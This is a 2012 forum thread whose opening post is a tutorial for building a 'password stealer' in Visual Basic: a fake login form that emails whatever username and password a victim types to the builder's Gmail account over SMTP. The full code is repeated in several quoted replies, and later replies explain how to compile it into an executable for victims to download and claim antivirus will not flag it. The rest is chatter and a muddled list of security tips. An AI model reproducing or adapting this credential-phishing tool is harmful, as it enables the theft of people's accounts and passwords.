Post: Account Stealer, usefull for all kind of sites! [Visual Basic 2010]
09-23-2012, 09:06 AM #1
FrenziosMix
Who’s Jim Erased?
(adsbygoogle = window.adsbygoogle || []).push({}); there are loads of tutorials on google, i am not the creator.. , i just wanted to share this with you guys,
In this tutorial you will learn how to Steal/Hack someone's password with Visual Basic 2010
This is just a simple example, you could design your program with images and more..

To do this you will need the following things
- a Gmail account
- Visual Basic

Difficulty - Easy

Let's get started..

First you'll need to create a new project name it "PasswordStealer"
You must login or register to view this content.[/CENTER]

When you have done that add:

-2 labels
-2 textboxes
-1 button

Try to make it look like a normal login form like this;
You must login or register to view this content.

Congratulations, you've finished your layout..

Now we need to make the button send the Username&Password to out mail Winky Winky , Double click on your Button and paste the following code

    
If Textbox1.Text = "" Then
MsgBox("Account Name Fehlt")
If Textbox2.Text = "" Then
MsgBox("Passwort Fehlt")
Else
End If
End If
Dim smtpServer As New SmtpClient
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("Your Email", "Your password")
'using gmail
smtpServer.port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("Your email")
mail.To.Add("Your email")
mail.Subject = "Username: & Textbox1.Text"
mail.Body = "Username : " & Textbox1.Text & ", " & "Password : " & Textbox2.Text
smtpServer.Send(mail)
MsgBox("Congratulations, You have succesfully created a password stealer.. Login into your mail, and see the username and password Smile")




You must login or register to view this content.

if i helped you please hit that thanks button Smile
Thanks,

~Roah
(adsbygoogle = window.adsbygoogle || []).push({});

The following 2 users say thank you to FrenziosMix for this useful post:

BIG_RED_BUTTON, GRUEL
10-01-2012, 05:37 PM #2
GRUEL
Can’t trickshot me!
Luckily I use Norton and Hotspot Shield so I get alerted when something like this appears
but nice tutorial.
10-01-2012, 07:43 PM #3
welliegs
Who’s Jim Erased?
derp derp
10-14-2012, 09:50 AM #4
Originally posted by roah View Post
there are loads of tutorials on google, i am not the creator.. , i just wanted to share this with you guys,
In this tutorial you will learn how to Steal/Hack someone's password with Visual Basic 2010
This is just a simple example, you could design your program with images and more..

To do this you will need the following things
- a Gmail account
- Visual Basic

Difficulty - Easy

Let's get started..

First you'll need to create a new project name it "PasswordStealer"
You must login or register to view this content.[/CENTER]

When you have done that add:

-2 labels
-2 textboxes
-1 button

Try to make it look like a normal login form like this;
You must login or register to view this content.

Congratulations, you've finished your layout..

Now we need to make the button send the Username&Password to out mail Winky Winky , Double click on your Button and paste the following code

    
If Textbox1.Text = "" Then
MsgBox("Account Name Fehlt")
If Textbox2.Text = "" Then
MsgBox("Passwort Fehlt")
Else
End If
End If
Dim smtpServer As New SmtpClient
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("Your Email", "Your password")
'using gmail
smtpServer.port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("Your email")
mail.To.Add("Your email")
mail.Subject = "Username: & Textbox1.Text"
mail.Body = "Username : " & Textbox1.Text & ", " & "Password : " & Textbox2.Text
smtpServer.Send(mail)
MsgBox("Congratulations, You have succesfully created a password stealer.. Login into your mail, and see the username and password Smile")




You must login or register to view this content.

if i helped you please hit that thanks button Smile
Thanks,

~Roah






Once ive created my application how do i make it into a proper program? like make people download it and stuff
10-14-2012, 10:52 PM #5
Originally posted by Mintydzn View Post
Once ive created my application how do i make it into a proper program? like make people download it and stuff


You hit debug while creating it. Then go to the project folder and find the debug folder. It should be in the bin folder. Then you will see the .exe and other files you need.
10-15-2012, 01:11 AM #6
Jk47785
I am error
Originally posted by roah View Post
there are loads of tutorials on google, i am not the creator.. , i just wanted to share this with you guys,
in this tutorial you will learn how to steal/hack someone's password with visual basic 2010
this is just a simple example, you could design your program with images and more..

to do this you will need the following things
- a gmail account
- visual basic

difficulty - easy

let's get started..

First you'll need to create a new project name it "passwordstealer"
You must login or register to view this content.[/center]

when you have done that add:

-2 labels
-2 textboxes
-1 button

try to make it look like a normal login form like this;
You must login or register to view this content.

congratulations, you've finished your layout..

Now we need to make the button send the username&password to out mail Winky Winky , double click on your button and paste the following code

    
if textbox1.text = "" then
msgbox("account name fehlt")
if textbox2.text = "" then
msgbox("passwort fehlt")
else
end if
end if
dim smtpserver as new smtpclient
dim mail as new mailmessage()
smtpserver.credentials = new net.networkcredential("your email", "your password")
'using gmail
smtpserver.port = 587
smtpserver.host = "smtp.gmail.com"
smtpserver.enablessl = true
mail = new mailmessage()
mail.from = new mailaddress("your email")
mail.to.add("your email")
mail.subject = "username: & textbox1.text"
mail.body = "username : " & textbox1.text & ", " & "password : " & textbox2.text
smtpserver.send(mail)
msgbox("congratulations, you have succesfully created a password stealer.. Login into your mail, and see the username and password Smile")




You must login or register to view this content.

if i helped you please hit that thanks button Smile
thanks,

~roah

holy shit does this really wrk ?
10-27-2012, 08:06 AM #7
salmak
Keeper
nice !! :fyea:
10-27-2012, 08:28 PM #8
Originally posted by GRUEL View Post
Luckily I use Norton and Hotspot Shield so I get alerted when something like this appears
but nice tutorial.


norton is the worst program ever and nice tut by the way
10-27-2012, 09:42 PM #9
GRUEL
Can’t trickshot me!
Originally posted by RacistPandas View Post
norton is the worst program ever and nice tut by the way


Well to stop this its easy

1. Use a moving IP Address

2. Use a Proxy server

3. When online do it so privately

4. Disable cookies

5. Look at the HTML in the search Bar very easy to spot a code or script when matched with the original

6. Make sure to use about 15 email's all using 15 - 20 charector passwords ie using numbers caps hyphens ect

7. Use more than one antivirus I use 5 at the moment

8. Script a personal fire wall to look for anomalous

9. Learn hoe to trace IP Address in case of being hacked / cracked you get back at your attacker ( learn cmd code)

10. Don't pretend to even know about cracking okay i'm doing 2 courses on IT Security at the moment just started
my HND so ye if I did get cracked well Righteous Retribution would be cast down onto the crackers motherboard in
a hail of fire resulting in a crisp fried sizzling motherboard.

And most people boasting about cracking do not have a notion on how to do it even when talking about it they
sound hilarious.

But that's your opinion your entitled to it just be wary and dont step on the wrong person as you never know who
they are and what they can do.
10-28-2012, 11:09 AM #10
Sloth
Banned
Originally posted by GRUEL View Post
Luckily I use Norton and Hotspot Shield so I get alerted when something like this appears
but nice tutorial.


This program won't be detected as a virus as all it's doing is sending plain text that the user has entered to and email.

Copyright © 2026, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo